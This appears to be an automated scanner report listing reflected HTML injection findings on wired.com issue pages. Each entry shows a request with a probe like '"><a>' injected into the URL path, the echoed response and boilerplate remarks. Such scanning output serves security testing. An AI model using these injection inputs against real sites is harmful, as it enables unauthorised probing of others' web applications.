GET /wired/issue/16-118228f"><a>340cdb6273d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:06:53 GMT Date: Mon, 22 Nov 2010 01:03:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-118228f"><a>340cdb6273d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70903"><a>c8dc6145ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue70903"><a>c8dc6145ff/16-12 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Mon, 22 Nov 2010 01:06:03 GMT Date: Mon, 22 Nov 2010 01:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue70903"><a>c8dc6145ff c_16-12"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c54b"><a>4cbaf84c7f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-121c54b"><a>4cbaf84c7f1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:07:01 GMT Date: Mon, 22 Nov 2010 01:03:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-121c54b"><a>4cbaf84c7f1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d4f"><a>120753b7ddd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuef3d4f"><a>120753b7ddd/17-01 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:05:57 GMT Date: Mon, 22 Nov 2010 01:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuef3d4f"><a>120753b7ddd c_17-01"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba0a"><a>b4ec8eb31ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-01fba0a"><a>b4ec8eb31ef HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:07:13 GMT Date: Mon, 22 Nov 2010 01:03:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-01fba0a"><a>b4ec8eb31ef"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715a4"><a>7789c2854ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue715a4"><a>7789c2854ae/17-02 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:20 GMT Date: Mon, 22 Nov 2010 01:02:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue715a4"><a>7789c2854ae c_17-02"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328c0"><a>0a02706438d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-02328c0"><a>0a02706438d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Mon, 22 Nov 2010 01:07:00 GMT Date: Mon, 22 Nov 2010 01:03:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-02328c0"><a>0a02706438d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d8b"><a>04647b3dbcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue75d8b"><a>04647b3dbcd/17-03 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:28 GMT Date: Mon, 22 Nov 2010 01:02:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue75d8b"><a>04647b3dbcd c_17-03"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55665"><a>72948330198 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-0355665"><a>72948330198 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:06:59 GMT Date: Mon, 22 Nov 2010 01:03:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-0355665"><a>72948330198"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ef3"><a>57259787c53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue20ef3"><a>57259787c53/17-04 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Mon, 22 Nov 2010 01:06:27 GMT Date: Mon, 22 Nov 2010 01:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue20ef3"><a>57259787c53 c_17-04"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cdd1"><a>9f7ac2fc7e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-045cdd1"><a>9f7ac2fc7e2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:07:00 GMT Date: Mon, 22 Nov 2010 01:03:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-045cdd1"><a>9f7ac2fc7e2"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f4a"><a>96ed1f40f40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue83f4a"><a>96ed1f40f40/17-05 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Mon, 22 Nov 2010 01:05:58 GMT Date: Mon, 22 Nov 2010 01:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue83f4a"><a>96ed1f40f40 c_17-05"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef828"><a>381362cea6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-05ef828"><a>381362cea6d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:06:57 GMT Date: Mon, 22 Nov 2010 01:03:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-05ef828"><a>381362cea6d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accf4"><a>f11fb1bdd52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueaccf4"><a>f11fb1bdd52/17-06 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:05:53 GMT Date: Mon, 22 Nov 2010 01:01:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueaccf4"><a>f11fb1bdd52 c_17-06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2bc0"><a>3f86a5f38af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-06d2bc0"><a>3f86a5f38af HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:06:28 GMT Date: Mon, 22 Nov 2010 01:02:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-06d2bc0"><a>3f86a5f38af"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79712"><a>eb8ee9010ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue79712"><a>eb8ee9010ab/17-07 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:06:12 GMT Date: Mon, 22 Nov 2010 01:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue79712"><a>eb8ee9010ab c_17-07"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fee2"><a>91dd18ca45c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-074fee2"><a>91dd18ca45c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:07:08 GMT Date: Mon, 22 Nov 2010 01:03:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-074fee2"><a>91dd18ca45c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d807e"><a>d5632562e89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issued807e"><a>d5632562e89/17-08 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:05:40 GMT Date: Mon, 22 Nov 2010 01:01:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issued807e"><a>d5632562e89 c_17-08"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4df0"><a>0915993bba4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
